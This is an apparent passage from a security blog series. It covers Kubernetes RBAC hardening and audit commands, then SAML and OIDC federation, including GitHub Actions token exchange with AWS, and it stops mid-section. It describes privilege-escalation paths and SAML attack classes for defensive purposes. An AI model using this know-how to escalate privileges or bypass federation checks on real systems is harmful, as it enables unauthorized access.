# ClusterRoleBinding: Prometheus can read cluster-wide (monitoring use case)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: prometheus-cluster-reader
subjects:
- kind: ServiceAccount
  name: prometheus
  namespace: monitoring
roleRef:
  kind: ClusterRole
  name: view
  apiGroup: rbac.authorization.k8s.io

An important pattern: a RoleBinding can reference a ClusterRole. This lets you define a role once at the cluster level (the ClusterRole) and bind it within specific namespaces through RoleBindings. The permissions are still scoped to the namespace where the RoleBinding lives. This is the right pattern for shared role definitions — define the permission set once, instantiate it with appropriate scope.

Default to RoleBinding over ClusterRoleBinding for namespace-scoped work. ClusterRoleBinding should be reserved for genuinely cluster-wide operations: monitoring agents, network plugins, cluster operators, security tooling.


Service Accounts — The Machine Identity in Kubernetes

Every pod in Kubernetes runs as a service account. If you don’t specify one, it uses the default service account in the pod’s namespace.

The default service account is where many RBAC misconfigurations accumulate. When someone creates a RoleBinding without thinking about which SA to use, they often bind the permission to default. Now every pod in that namespace that doesn’t explicitly set a service account — including pods deployed by developers who aren’t thinking about RBAC — inherits that binding.

# Create a dedicated SA for each application
kubectl create serviceaccount app-backend -n production

# Check what any SA can currently do — use this in every audit
kubectl auth can-i --list --as=system:serviceaccount:production:app-backend -n production

# Check a specific action
kubectl auth can-i get secrets \
  --as=system:serviceaccount:production:app-backend -n production

kubectl auth can-i create pods \
  --as=system:serviceaccount:production:app-backend -n production

Disable Auto-Mounting the SA Token

By default, Kubernetes mounts the service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. A pod that doesn’t need to call the Kubernetes API doesn’t need this token. Having it mounted increases the blast radius if the pod is compromised — the token can be used to call the K8s API with whatever RBAC permissions the SA has.

# Disable at the pod level
apiVersion: v1
kind: Pod
metadata:
  name: app-backend
  namespace: production
spec:
  automountServiceAccountToken: false
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest

# Or at the service account level (applies to all pods using this SA)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
automountServiceAccountToken: false

For most application pods — anything that isn’t a Kubernetes operator, controller, or management tool — the K8s API token is unnecessary. Disable it.
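
When both the pod and the service account set the field, the pod spec wins. A minimal sketch of that precedence, assuming plain dicts shaped like the manifests above; `token_is_mounted` is a hypothetical helper name, not part of any Kubernetes client:

```python
def token_is_mounted(pod_spec: dict, service_account: dict) -> bool:
    """Resolve automountServiceAccountToken the way the manifests above combine.

    Precedence: pod spec, then ServiceAccount, then the default (mounted).
    """
    pod_setting = pod_spec.get("automountServiceAccountToken")
    if pod_setting is not None:
        return pod_setting
    sa_setting = service_account.get("automountServiceAccountToken")
    if sa_setting is not None:
        return sa_setting
    return True  # neither object sets the field: the token is mounted


sa_disabled = {"automountServiceAccountToken": False}
print(token_is_mounted({}, {}))                                             # nothing set
print(token_is_mounted({}, sa_disabled))                                    # SA opts out
print(token_is_mounted({"automountServiceAccountToken": True}, sa_disabled))  # pod overrides
```

The practical consequence: disabling the token on the service account is a sensible default, but a single pod spec can still opt back in, so audits need to look at both objects.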


Human Access to Kubernetes — Get Off Client Certificates

Kubernetes doesn’t manage human users natively. Authentication is delegated to an external mechanism. The most common approaches:

Method | Notes
--- | ---
X.509 client certificates | Common for initial cluster setup; credentials are embedded in kubeconfig; individual certificates cannot be revoked without rotating the CA
Static bearer tokens | Long-lived; avoid
OIDC via external IdP | Preferred for human access: supports SSO, MFA, and revocation via IdP
Webhook auth | Flexible, requires custom infrastructure

X.509 certificates are the bootstrap pattern. Every managed Kubernetes offering generates an admin kubeconfig with a client certificate. The problem: you can’t revoke individual certificates without rotating the CA. If you’re giving human engineers access via client certificates, someone leaving doesn’t actually lose cluster access until the certificate expires.

OIDC is the right model. Configure the kube-apiserver to accept JWTs from your IdP, bind RBAC permissions to groups from the IdP, and revocation becomes “remove from IdP group” rather than “hope the certificate expires soon”:

# kube-apiserver flags for OIDC (managed clusters configure this via provider settings)
--oidc-issuer-url=https://dex.company.com
--oidc-client-id=kubernetes
--oidc-username-claim=email
--oidc-groups-claim=groups
--oidc-groups-prefix=oidc:

# User's kubeconfig: uses an exec plugin to fetch an OIDC token
# (the issuer URL and client ID must match the kube-apiserver flags)
users:
- name: alice
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: kubectl
      args:
        - oidc-login
        - get-token
        - --oidc-issuer-url=https://dex.company.com
        - --oidc-client-id=kubernetes
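
To make the flag semantics concrete, here is a hedged sketch of how token claims turn into the username and groups that RBAC sees. The function name `to_user_info` and the sample claims (including the example.com address) are assumptions for illustration; the real mapping happens inside kube-apiserver and has more options than shown here.

```python
def to_user_info(claims: dict,
                 username_claim: str = "email",
                 groups_claim: str = "groups",
                 groups_prefix: str = "oidc:") -> dict:
    """Map ID token claims to the identity RBAC evaluates (simplified)."""
    username = claims[username_claim]
    # Every group from the token is prefixed, so IdP groups can never collide
    # with built-in groups such as system:masters.
    groups = [groups_prefix + g for g in claims.get(groups_claim, [])]
    return {"username": username, "groups": groups}


# Hypothetical claims as an IdP might issue them.
claims = {
    "iss": "https://dex.company.com",
    "email": "alice@example.com",
    "groups": ["dev-team", "oncall"],
}
user = to_user_info(claims)
print(user)
```

The detail that trips people up: with a groups prefix of `oidc:`, a RoleBinding subject must name the group `oidc:dev-team`, not `dev-team`, or the binding silently matches nobody.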

With managed clusters:

# EKS: add IAM role as a cluster access entry (replaces the aws-auth ConfigMap)
aws eks create-access-entry \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --type STANDARD

aws eks associate-access-policy \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy \
  --access-scope type=namespace,namespaces=production,staging

# GKE: get credentials; IAM roles map to cluster permissions
gcloud container clusters get-credentials my-cluster --region us-central1
# roles/container.developer → edit permissions
# But: use Kubernetes RBAC (RoleBindings, or ClusterRoleBindings where access is genuinely cluster-wide) for fine-grained control rather than relying on GCP IAM roles

# AKS: bind Entra ID groups to Kubernetes RBAC
az aks get-credentials --name my-aks --resource-group rg-prod
kubectl create clusterrolebinding dev-team-view \
  --clusterrole=view \
  --group=ENTRA_GROUP_OBJECT_ID

Cloud IAM + Kubernetes RBAC: The Integration Points

EKS Pod Identity / IRSA (revisited)

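With IRSA, the annotation on the Kubernetes ServiceAccount is the bridge. (EKS Pod Identity maps the ServiceAccount to a role through a pod identity association created in the EKS API instead, so it needs no annotation.)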

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/AppBackendRole

Kubernetes RBAC controls what the pod can do inside the cluster. The IAM role controls what the pod can do in AWS. Both must be explicitly granted; neither inherits from the other.

GKE Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: GSA_NAME@PROJECT_ID.iam.gserviceaccount.com

AKS Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "MANAGED_IDENTITY_CLIENT_ID"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"
spec:
  serviceAccountName: app-backend

RBAC Audit — What to Check First

# Start here: who has cluster-admin?
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | 
      {binding: .metadata.name, subjects: .subjects}'
# cluster-admin should bind to almost nobody — review every result

# Find ClusterRoles with wildcard permissions
kubectl get clusterroles -o json | \
  jq -r '.items[] | select(any(.rules[]?.verbs[]?; . == "*")) | .metadata.name'

# What can the default SA do in each namespace?
for ns in $(kubectl get namespaces -o name | cut -d/ -f2); do
  echo "=== $ns ==="
  kubectl auth can-i --list --as="system:serviceaccount:${ns}:default" -n "${ns}" 2>/dev/null \
    | head -10
done

# What can a specific SA do?
kubectl auth can-i --list \
  --as=system:serviceaccount:production:app-backend \
  -n production

# Check whether an SA can escalate — key risk indicators
kubectl auth can-i get secrets -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create pods -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create rolebindings -n production \
  --as=system:serviceaccount:production:app-backend

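Creating pods and creating rolebindings are privilege escalation primitives. A service account that can create pods can run a pod under a different, more powerful SA in the same namespace and use that SA’s token. A service account that can create rolebindings can grant itself more permissions whenever it also holds the bind verb on a role, or already has every permission that role contains; Kubernetes rejects the binding otherwise, so check for bind and escalate as well.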
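
The same check can be run against Role rules exported as JSON. A rough sketch, assuming rules shaped like the `rules` array of a Role or ClusterRole; `RISKY` and `risky_grants` are hypothetical names, the list of risky pairs is deliberately short, and apiGroups and resourceNames are ignored for brevity:

```python
# Hypothetical, non-exhaustive list of (resource, verb) pairs worth flagging.
RISKY = {
    ("pods", "create"): "can launch a pod under another service account",
    ("rolebindings", "create"): "can bind roles, subject to RBAC escalation checks",
    ("secrets", "get"): "can read secret values",
}


def risky_grants(rules):
    """Return the sorted (resource, verb) pairs from RISKY that the rules allow."""
    findings = set()
    for rule in rules:
        resources = rule.get("resources", [])
        verbs = rule.get("verbs", [])
        for resource, verb in RISKY:
            resource_match = resource in resources or "*" in resources
            verb_match = verb in verbs or "*" in verbs
            if resource_match and verb_match:
                findings.add((resource, verb))
    return sorted(findings)


deployer_rules = [
    {"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "create"]},
    {"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]},
]
wildcard_rules = [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]

for resource, verb in risky_grants(deployer_rules):
    print(f"{verb} {resource}: {RISKY[(resource, verb)]}")
```

Wildcards are treated as matching everything, which is the point: a `*` rule carries every escalation primitive at once.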

Useful Tools

# rbac-tool — visualize and analyze RBAC (install: kubectl krew install rbac-tool)
kubectl rbac-tool viz                              # generate a graph of all bindings
kubectl rbac-tool who-can get secrets -n production
kubectl rbac-tool lookup USER_EMAIL

# rakkess: access matrix for a subject (the krew plugin is named access-matrix)
kubectl access-matrix --sa production:app-backend

# audit2rbac — generate minimal RBAC from audit logs
audit2rbac --filename /var/log/kubernetes/audit.log \
  --serviceaccount production:app-backend

Common RBAC Misconfigurations

Misconfiguration | Risk | Fix
--- | --- | ---
cluster-admin bound to application SA | Full cluster takeover from compromised pod | Minimal ClusterRole; scope to namespace where possible
list or wildcard on secrets | Read all secrets in scope, including credentials and API keys | Grant get on specific named secrets only
default SA with non-trivial permissions | Every pod in the namespace inherits the permission | Bind permissions to dedicated SAs; automountServiceAccountToken: false on default
ClusterRoleBinding for namespace-scoped work | Namespace work with cluster-wide permission | Always prefer RoleBinding; ClusterRoleBinding only for genuinely cluster-wide needs
Binding users by username string | Hard to revoke; doesn’t sync with IdP | Bind groups from IdP; revocation propagates through group membership
SA can create pods or create rolebindings | Privilege escalation path | Audit and remove these from non-privileged SAs

Framework Alignment

Framework Reference | What It Covers Here
--- | ---
CISSP Domain 5: Identity and Access Management | Kubernetes RBAC operates as a full IAM system at the platform layer, independent of cloud IAM
CISSP Domain 3: Security Architecture | Two independent authorization layers (cloud + K8s) must each be designed and audited; one does not compensate for the other
ISO 27001:2022 5.15 Access control | Kubernetes RBAC Roles, ClusterRoles, and bindings implement access control within the container platform
ISO 27001:2022 5.18 Access rights | Service account provisioning, OIDC-based human access, and workload identity integration with cloud IAM
ISO 27001:2022 8.2 Privileged access rights | cluster-admin and wildcard RBAC bindings represent the highest-privilege grants in Kubernetes
SOC 2 CC6.1 | Kubernetes RBAC is the access control mechanism for the container platform layer in CC6.1
SOC 2 CC6.3 | Binding revocation, SA token disabling, and OIDC group-based access removal satisfy CC6.3 requirements

Key Takeaways

  • Kubernetes RBAC and cloud IAM are separate authorization layers — both must be secured; strong cloud IAM with weak K8s RBAC is still a vulnerable cluster
  • cluster-admin bindings are the first thing to audit in any cluster — the blast radius of a compromised pod with cluster-admin is the entire cluster
  • Disable automountServiceAccountToken on service accounts and pods that don’t call the Kubernetes API — most application pods don’t need it
  • Use OIDC for human access rather than client certificates; removing someone in the IdP stops new tokens from being issued, so access ends when their current short-lived token expires
  • Bind groups from IdP rather than individual usernames; revocation propagates automatically when someone leaves
  • A service account that can create pods or create rolebindings is a privilege escalation path — audit for these in every namespace

What’s Next

EP12 is the capstone: Zero Trust IAM — how all the concepts in this series come together into an architecture that assumes nothing is implicitly trusted, verifies everything explicitly, and limits blast radius through least privilege enforced at every layer.


SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?

Reading Time: 10 minutes





TL;DR

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t manage them independently
  • SAML is XML-based, browser-oriented, the enterprise standard; OIDC is JWT-based, API-native, the modern protocol for workload identity and consumer SSO
  • In OIDC trust policies, the sub condition is the security boundary — omitting it means any GitHub Actions workflow in any repository can assume your role
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but need correct configuration (especially aud)
  • The IdP is the trust anchor: compromise the IdP and every downstream system is compromised. Treat IdP admin access with the same controls as your most sensitive system.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

The Big Picture

  FEDERATION: HOW TRUST FLOWS FROM IdP TO DOWNSTREAM SYSTEMS

  Identity Provider  (Okta / Entra ID / Google / AD FS)
  ┌──────────────────────────────────────────────────────────────────┐
  │  User or workload authenticates → IdP issues signed assertion   │
  │                                                                  │
  │  ┌──────────────────────────┐  ┌───────────────────────────┐   │
  │  │  SAML Assertion (XML)    │  │  OIDC ID Token (JWT)       │   │
  │  │  RSA-signed, 5–10 min    │  │  RS256-signed, ~1 hr      │   │
  │  │  Audience: SP entity ID  │  │  aud: client ID           │   │
  │  │  Subject: user identity  │  │  sub: specific workload   │   │
  │  └───────────┬──────────────┘  └──────────┬────────────────┘   │
  └─────────────────────────────────────────────────────────────────┘
                 │  human SSO                  │  workload identity
                 ▼                             ▼
  ┌─────────────────────────┐  ┌───────────────────────────────────┐
  │ SP validates signature  │  │ AWS STS / GCP STS validates       │
  │ + audience + timestamp  │  │ signature + iss + aud + sub       │
  │ → console session       │  │ → AssumeRoleWithWebIdentity       │
  └─────────────────────────┘  └───────────────────────────────────┘

  Security bound: IdP security bounds every system that trusts it
  Disable in Okta → access revoked everywhere that trusts Okta

Introduction

Before federation existed, every system had its own user database. Your Jira account. Your AWS account. Your Salesforce account. Your internal wiki. Each one had its own password, its own MFA, its own offboarding process. When an engineer joined, someone had to create accounts in every system. When they left, you hoped whoever processed the offboarding remembered to deactivate all of them.

I’ve done that audit — the one where you’re trying to figure out if a former employee still has access to anything. You go system by system, cross-reference against HR records, find accounts that exist in places you’ve forgotten the company even uses. In one environment I found an ex-engineer’s account still active in a vendor portal six months after they left, because that system was set up by someone who had since also left the company, and nobody had documented it.

Federation solves this structurally. One identity provider. One place to authenticate. One place to revoke. Every downstream system trusts the IdP’s assertion rather than managing credentials independently. Disable someone in Okta and they lose access everywhere that trusts Okta — immediately, without a checklist.

This episode is how federation actually works at the protocol level, because understanding the mechanism is what lets you design it securely. A federation setup with a trust policy that accepts assertions from any OIDC issuer is worse than no federation — it’s a false sense of security.


The Federation Model

Identity Provider (IdP)          Service Provider (SP) / Relying Party
  (Okta, Google, AD FS, Entra ID)       (AWS, Salesforce, GitHub, your app)
         │                                          │
         │  1. User authenticates to IdP             │
         │     (password + MFA)                      │
         │                                          │
         │  2. IdP generates a signed assertion      │
         │     (SAML response or OIDC ID Token)      │
         │ ──────────────────────────────────────── ▶│
         │                                          │
         │  3. SP validates the signature            │
         │     (using IdP's public certificate       │
         │      or JWKS endpoint)                    │
         │  4. SP maps identity to local permissions │
         │  5. SP grants access                      │

The SP never sees the user’s password. It never has one. It trusts the IdP’s cryptographic signature — if the assertion is signed with the IdP’s private key, and the SP trusts that key, the identity is accepted.

This trust chain has one critical property: the security of every SP is bounded by the security of the IdP. Compromise the IdP, and every system that trusts it is compromised. This is why IdP security deserves the same attention as the most sensitive system it gates access to.


SAML 2.0 — The Enterprise Standard

SAML (Security Assertion Markup Language) is XML-based, verbose, and battle-tested. Published in 2005, it’s the protocol behind most enterprise SSO deployments. When your company says “use your corporate login for this vendor app,” SAML is usually the mechanism.

How a SAML Login Flows

1. User visits AWS console (the Service Provider)
2. AWS checks: no active session → redirect to IdP
   → https://company.okta.com/saml?SAMLRequest=...
3. Okta authenticates the user (password, MFA)
4. Okta generates a SAML Assertion — a signed XML document containing:
   - Who the user is (Subject, typically email)
   - Their attributes (group memberships, custom attributes)
   - When the assertion was issued and when it expires (valid 5-10 minutes typically)
   - Which SP this is for (Audience restriction)
   - Okta's digital signature (RSA-SHA256 or similar)
5. Browser POSTs the assertion to AWS's ACS (Assertion Consumer Service) URL
6. AWS validates the signature against Okta's public cert (retrieved from Okta's metadata URL)
7. AWS reads the SAML attribute for the IAM role
8. AWS calls sts:AssumeRoleWithSAML → issues temporary credentials
9. User gets a console session — no AWS credentials were ever stored anywhere

What a SAML Assertion Actually Looks Like

<saml:Assertion>
  <saml:Issuer>https://okta.company.com</saml:Issuer>

  <saml:Subject>
    <saml:NameID>USER_EMAIL</saml:NameID>
  </saml:Subject>

  <saml:AttributeStatement>
    <!-- This attribute tells AWS which IAM role to assume -->
    <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
      <saml:AttributeValue>
        arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider
      </saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>

  <!-- Critical: time bounds on this assertion -->
  <saml:Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <saml:AudienceRestriction>
      <!-- Critical: this assertion is ONLY valid for AWS -->
      <saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>

  <ds:Signature>... RSA-SHA256 signature over the above ...</ds:Signature>
</saml:Assertion>

The Audience restriction and the NotOnOrAfter timestamp are two of the most security-critical fields. The audience ensures this assertion can’t be reused for a different SP. The timestamp ensures it can’t be replayed after expiry.
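
A minimal sketch of those two checks, using the values from the assertion above. It covers only the Conditions element; signature verification must come first and belongs to a vetted SAML library. The helper names `parse_saml_time` and `conditions_hold` are hypothetical.

```python
from datetime import datetime, timezone

AWS_AUDIENCE = "https://signin.aws.amazon.com/saml"


def parse_saml_time(value: str) -> datetime:
    """Parse a UTC timestamp of the form used in the assertion above."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def conditions_hold(not_before: str, not_on_or_after: str,
                    audiences: list, expected_audience: str,
                    now: datetime) -> bool:
    """True only if `now` is inside the validity window and the audience matches."""
    in_window = parse_saml_time(not_before) <= now < parse_saml_time(not_on_or_after)
    return in_window and expected_audience in audiences


window = ("2026-04-11T09:00:00Z", "2026-04-11T09:05:00Z")
inside = datetime(2026, 4, 11, 9, 2, tzinfo=timezone.utc)
at_expiry = datetime(2026, 4, 11, 9, 5, tzinfo=timezone.utc)

print(conditions_hold(*window, [AWS_AUDIENCE], AWS_AUDIENCE, inside))
print(conditions_hold(*window, [AWS_AUDIENCE], AWS_AUDIENCE, at_expiry))
print(conditions_hold(*window, ["https://other-sp.example.com"], AWS_AUDIENCE, inside))
```

Note the half-open interval: an assertion presented exactly at NotOnOrAfter is already invalid. Real SPs usually allow a small clock-skew tolerance on top of this.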

Setting Up SAML Federation with AWS

# Register Okta as a SAML provider in AWS IAM
aws iam create-saml-provider \
  --saml-metadata-document file://okta-metadata.xml \
  --name OktaProvider

# Create the IAM role that federated users will assume
aws iam create-role \
  --role-name EngineerRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:saml-provider/OktaProvider"
      },
      "Action": "sts:AssumeRoleWithSAML",
      "Condition": {
        "StringEquals": {
          "SAML:aud": "https://signin.aws.amazon.com/saml"
        }
      }
    }]
  }'

# In Okta: configure the AWS Account Federation app (the Role attribute below is for IAM SAML federation, not IAM Identity Center)
# Attribute mapping: https://aws.amazon.com/SAML/Attributes/Role
# Value: arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider

# Set maximum session duration (8 hours is reasonable for human access)
aws iam update-role \
  --role-name EngineerRole \
  --max-session-duration 28800

SAML Attack Surface

Attack | What It Does | Why It Works | Prevention
--- | --- | --- | ---
XML Signature Wrapping (XSW) | Attacker inserts a malicious assertion, wraps it around the legitimate signed one; some SPs validate the wrong element | SAML’s XML structure is complex; naive signature validation checks the signed element, not the element the SP reads | Use a vetted SAML library; never hand-roll parsing
Assertion replay | Steal a valid assertion (e.g., via network intercept) and replay it before NotOnOrAfter | If the SP doesn’t track used assertion IDs, the same assertion can be used multiple times | Short expiry; SP tracks seen assertion IDs
Audience bypass | SP doesn’t verify the Audience field | An assertion issued for SP A can be used at SP B | Always validate Audience matches your SP entity ID

XML Signature Wrapping is the most interesting attack historically — it was how security researchers demonstrated SAML implementations in AWS, Google, and others could be bypassed before vendors patched their libraries. The lesson: SAML is complex enough that rolling your own parser is asking for a vulnerability.
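
The replay defense from the table (the SP tracks assertion IDs it has already seen) is small enough to sketch. This is an in-memory illustration only, with a hypothetical class name; a production SP behind a load balancer would need a shared store so every node sees the same set of IDs.

```python
class AssertionReplayCache:
    """Remember assertion IDs until they expire; reject any ID seen twice."""

    def __init__(self):
        self._seen = {}  # assertion ID -> NotOnOrAfter as epoch seconds

    def accept(self, assertion_id: str, not_on_or_after: float, now: float) -> bool:
        # Entries past their expiry can be dropped: an expired assertion is
        # rejected on the time check anyway, so the ID no longer needs tracking.
        self._seen = {k: exp for k, exp in self._seen.items() if exp > now}
        if now >= not_on_or_after:
            return False  # expired
        if assertion_id in self._seen:
            return False  # replay
        self._seen[assertion_id] = not_on_or_after
        return True


cache = AssertionReplayCache()
first = cache.accept("_a1b2c3", not_on_or_after=1000.0, now=900.0)
replayed = cache.accept("_a1b2c3", not_on_or_after=1000.0, now=950.0)
expired = cache.accept("_d4e5f6", not_on_or_after=1000.0, now=1000.0)
print(first, replayed, expired)
```

Short assertion lifetimes are what keep this cache small: the SP only has to remember IDs for the few minutes in which a replay could still succeed.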


OpenID Connect (OIDC) — The Modern Protocol

OIDC is JSON-based, REST-native, and designed for the web and API-first world. Built on top of OAuth 2.0, it’s the protocol behind “Sign in with Google,” GitHub’s OIDC tokens for Actions, and workload identity federation across cloud providers.

Token Anatomy

An OIDC ID Token is a JWT: three base64url-encoded parts separated by dots:

Header.Payload.Signature

Header:
{
  "alg": "RS256",           ← signing algorithm
  "kid": "key-id-123"       ← which key signed this (for JWKS rotation)
}

Payload (the claims):
{
  "iss": "https://accounts.google.com",         ← who issued this token
  "sub": "108378629573454321234",               ← stable user identifier (not email)
  "aud": "my-app-client-id",                   ← who this token is for
  "exp": 1749600000,                           ← expires at (Unix timestamp)
  "iat": 1749596400,                           ← issued at
  "email": "USER_EMAIL",
  "email_verified": true,
  "hd": "company.com"                          ← hosted domain (Google Workspace)
}

Signature: RSA-SHA256(base64url(header) + "." + base64url(payload), idp_private_key)

The relying party (your application, or AWS STS) validates the signature using the IdP’s public keys, published at its JWKS endpoint. The exact URL is listed as jwks_uri in the IdP’s discovery document at /.well-known/openid-configuration; the path varies by provider. The signature verification proves the token was issued by the expected IdP and hasn’t been tampered with since.
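
For debugging it helps to look inside a token. The sketch below builds a demo token with a fake signature and decodes its header and payload using only the standard library. It does not verify anything, so it is for inspection only and never for an access decision; the helper names are hypothetical.

```python
import base64
import json


def b64url_encode(raw: bytes) -> str:
    """base64url without padding, as used in JWTs."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the stripped padding, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def peek(token: str):
    """Return (header, payload) WITHOUT verifying the signature."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


# Demo token: real structure, fake signature.
header = {"alg": "RS256", "kid": "key-id-123"}
payload = {"iss": "https://accounts.google.com", "aud": "my-app-client-id", "exp": 1749600000}
token = ".".join([
    b64url_encode(json.dumps(header).encode()),
    b64url_encode(json.dumps(payload).encode()),
    b64url_encode(b"not-a-real-signature"),
])

decoded_header, decoded_payload = peek(token)
print(decoded_header["kid"], decoded_payload["aud"])
```

Anyone holding a token can read its claims this way, which is a useful reminder that a JWT is signed, not encrypted.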

The Full OIDC Token Exchange (GitHub Actions → AWS)

# GitHub Actions automatically provides an OIDC token in the runner environment
# The token contains: iss=https://token.actions.githubusercontent.com, repo, ref, sha, run_id, etc.

# Step 1: Fetch the OIDC token from GitHub's token service
TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')

# Step 2: Present to AWS STS for exchange
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::123456789012:role/GitHubActionsRole \
  --role-session-name github-deploy \
  --web-identity-token "${TOKEN}"

# STS performs these validations:
# 1. Fetch GitHub's JWKS: https://token.actions.githubusercontent.com/.well-known/jwks
# 2. Verify signature is valid
# 3. Verify iss = "https://token.actions.githubusercontent.com" (matches OIDC provider)
# 4. Verify aud = "sts.amazonaws.com"
# 5. Verify sub matches the trust policy condition
# 6. Verify exp is in the future

The trust policy condition on the IAM role is what prevents any GitHub repository from assuming this role:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
        "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
      }
    }
  }]
}

The sub condition is the security boundary. repo:my-org/my-repo:ref:refs/heads/main means: only runs triggered from the main branch of my-org/my-repo can assume this role. A pull request from a fork, a run from a different repo, or a run from a different branch — all get a different sub claim and the assumption fails.

I’ve reviewed trust policies that omit the sub condition and check only aud. That means any GitHub Actions workflow, in any repository, owned by anyone, can assume that role. This is not a theoretical risk: anyone can create a GitHub repository and run Actions workflows in it.
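
The difference between the two trust policies is easy to see in a toy evaluator. This is a simplified sketch of StringEquals matching only, not how STS is implemented; `string_equals_ok` and the sample claim sets are assumptions for illustration.

```python
PROVIDER = "token.actions.githubusercontent.com"


def string_equals_ok(condition: dict, claims: dict) -> bool:
    """Every key in the StringEquals block must equal the matching token claim."""
    for key, expected in condition.items():
        claim_name = key[len(PROVIDER) + 1:]  # strip the "provider:" prefix
        if claims.get(claim_name) != expected:
            return False
    return True


pinned = {
    f"{PROVIDER}:aud": "sts.amazonaws.com",
    f"{PROVIDER}:sub": "repo:my-org/my-repo:ref:refs/heads/main",
}
aud_only = {f"{PROVIDER}:aud": "sts.amazonaws.com"}

# Hypothetical claims: a run on main in the trusted repo, and a run in someone else's repo.
main_run = {"aud": "sts.amazonaws.com", "sub": "repo:my-org/my-repo:ref:refs/heads/main"}
stranger = {"aud": "sts.amazonaws.com", "sub": "repo:someone-else/their-repo:ref:refs/heads/main"}

print(string_equals_ok(pinned, main_run), string_equals_ok(pinned, stranger))
print(string_equals_ok(aud_only, stranger))
```

The aud value is the same for every workflow that asks for an AWS token, so a policy that checks only aud cannot tell your repository from anyone else's.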

OIDC Validation Checklist

Every application that validates OIDC tokens must check all of these:

✓ Signature valid (using IdP's JWKS endpoint — not a hardcoded key)
✓ iss matches the expected IdP URL
✓ aud matches your application's client ID (not just "any audience")
✓ exp is in the future
✓ nbf (not before), if present, is in the past
✓ iat is recent (within your clock skew tolerance)
✓ For workload identity: sub is pinned to the specific workload

Skipping aud validation is the most common mistake. A token issued for application A with aud: app-a-client-id should not be accepted by application B. Without audience validation, any application that can obtain a token from the IdP can replay it at any other application that trusts the same IdP. Libraries like python-jose and jsonwebtoken can check aud for you, but only against the expected audience value you pass in; confirm how your library behaves when that value is missing, because some skip the check instead of failing.
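
The claim checks from the list can be sketched with the standard library. This covers claims only and assumes signature verification against the IdP's JWKS has already succeeded in a proper JWT library; `failed_checks` is a hypothetical helper and the 60-second skew is an arbitrary illustration value.

```python
import time


def failed_checks(claims: dict, expected_iss: str, expected_aud: str,
                  now: float = None, skew: int = 60) -> list:
    """Return the names of the claim checks that fail (empty list means all pass)."""
    now = time.time() if now is None else now
    failed = []
    if claims.get("iss") != expected_iss:
        failed.append("iss")
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]  # aud may be a string or a list
    if expected_aud not in audiences:
        failed.append("aud")
    exp = claims.get("exp")
    if exp is None or now > exp + skew:
        failed.append("exp")
    nbf = claims.get("nbf")
    if nbf is not None and now < nbf - skew:
        failed.append("nbf")
    iat = claims.get("iat")
    if iat is not None and iat > now + skew:  # issued in the future
        failed.append("iat")
    return failed


claims = {
    "iss": "https://accounts.google.com",
    "sub": "108378629573454321234",
    "aud": "my-app-client-id",
    "exp": 1749600000,
    "iat": 1749596400,
}
print(failed_checks(claims, "https://accounts.google.com", "my-app-client-id", now=1749598000))
print(failed_checks(claims, "https://accounts.google.com", "app-b-client-id", now=1749598000))
```

Returning the list of failures rather than a bare boolean makes rejected tokens much easier to diagnose in logs.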


Enterprise Federation Patterns

Multi-Account AWS with IAM Identity Center + Okta

